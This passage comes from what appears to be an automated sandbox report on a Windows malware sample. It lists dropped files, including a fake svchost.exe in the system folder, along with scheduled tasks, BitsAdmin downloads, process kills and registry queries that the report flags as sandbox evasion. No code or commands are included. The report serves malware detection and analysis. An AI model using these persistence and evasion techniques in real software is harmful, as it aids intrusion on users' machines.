(x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libnsv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png autosubplayer.exe -
Drops file in Windows directory 38 IoCs
Processes:
svchost.exemsiexec.exeMsiExec.exeE8b5UKJ6STYQ0e00s7p6lTHo.exeWerFault.exesvchost.exedescription ioc Process File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\Installer\MSI7E07.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI90C5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9F60.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DF9E1B4BE4B9482C94.TMP msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File opened for modification C:\Windows\Installer\MSIF7B9.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\System\svchost.exe E8b5UKJ6STYQ0e00s7p6lTHo.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI9C62.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDD98.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIFE6.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF035EDA9DB572FD2E.TMP msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File created C:\Windows\Installer\f796fce.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIC24C.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF778F9CC24B6C3EF3.TMP msiexec.exe File opened for modification C:\Windows\Installer\f796fce.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID161.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFD2B628DD20E03FDA.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSIC1C.tmp msiexec.exe File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\System\xxx1.bak E8b5UKJ6STYQ0e00s7p6lTHo.exe File opened for modification C:\Windows\Installer\MSI9346.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIC598.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIBCEC.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID9CE.tmp msiexec.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File created C:\Windows\System\svchost.exe E8b5UKJ6STYQ0e00s7p6lTHo.exe File created C:\Windows\System\xxx1.bak svchost.exe File opened for modification C:\Windows\Installer\MSI975E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI99FF.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 16 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target Process procid_target 2736 4388 WerFault.exe 91 2308 2444 WerFault.exe 105 3748 1416 WerFault.exe 96 1704 2696 WerFault.exe 114 2104 3696 WerFault.exe 146 5176 3480 WerFault.exe 147 5548 5412 WerFault.exe 143 4596 768 WerFault.exe 191 5920 3440 WerFault.exe 204 3480 3728 WerFault.exe 215 1732 5096 WerFault.exe 266 6504 908 WerFault.exe 288 6808 6420 WerFault.exe 299 7052 6752 WerFault.exe 304 6204 6820 WerFault.exe 323 5792 6420 WerFault.exe 326 -
NSIS installer 4 IoCs
Processes:
resource yara_rule behavioral4/files/0x000200000002a21c-238.dat nsis_installer_1 behavioral4/files/0x000200000002a21c-238.dat nsis_installer_2 behavioral4/files/0x000200000002a21c-272.dat nsis_installer_1 behavioral4/files/0x000200000002a21c-272.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exetGPLfmakviwwx8D8QKxJELZ_.exeD93A.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs svchost.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tGPLfmakviwwx8D8QKxJELZ_.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D93A.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D93A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tGPLfmakviwwx8D8QKxJELZ_.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI tGPLfmakviwwx8D8QKxJELZ_.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D93A.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesvchost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exebuild.exedescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exepid Process 3620 schtasks.exe 2112 schtasks.exe 1212 schtasks.exe 1892 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 1360 timeout.exe -
Download via BitsAdmin 1 TTPs 2 IoCs
Processes:
bitsadmin.exebitsadmin.exepid Process 3068 bitsadmin.exe 4424 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 35 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 4 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exepid Process 3500 taskkill.exe 5880 taskkill.exe 1104 taskkill.exe 5968 taskkill.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
WaaSMedicAgent.exesvchost.exeWaaSMedicAgent.exesvchost.exemsiexec.exedescription ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\DeviceLicenseUpdateFailureCount = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs svchost.exe -
Modifies registry class 8 IoCs
Processes:
msedge.exeCalculator.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{FA1268EB-855D-4D0C-B922-8638AE1A47A4} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{CF5867C2-B8F3-4CFB-AF55-E473A7095A43} Calculator.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ -
Processes:
